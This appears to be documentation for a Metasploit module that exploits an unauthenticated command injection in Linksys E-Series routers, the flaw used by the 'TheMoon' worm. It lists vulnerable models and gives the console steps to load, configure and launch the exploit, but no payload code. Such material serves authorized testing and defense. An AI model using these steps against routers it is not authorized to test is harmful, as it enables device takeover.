Linksys E-Series TheMoon Remote Command Injection

Some Linksys E-Series Routers are vulnerable to an unauthenticated OS command injection. This vulnerability was used from the so-called "TheMoon" worm. There are many Linksys systems that are potentially vulnerable, including E4200, E3200, E3000, E2500, E2100L, E2000, E1550, E1500, E1200, E1000, and E900. This module was tested successfully against an E1500 v1.0.5.

Module Options

To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced':

msf > use exploit/linux/http/linksys_themoon_exec
msf exploit(linksys_themoon_exec) > show targets
msf exploit(linksys_themoon_exec) > set TARGET < target-id >
msf exploit(linksys_themoon_exec) > show options
    ...show and set options...
msf exploit(linksys_themoon_exec) > exploit

Time is precious, so I don’t want to do something manually that I can automate. Leveraging the Metasploit Framework when automating any task keeps us from having to re-create the wheel as we can use the existing libraries and focus our efforts where it matters.
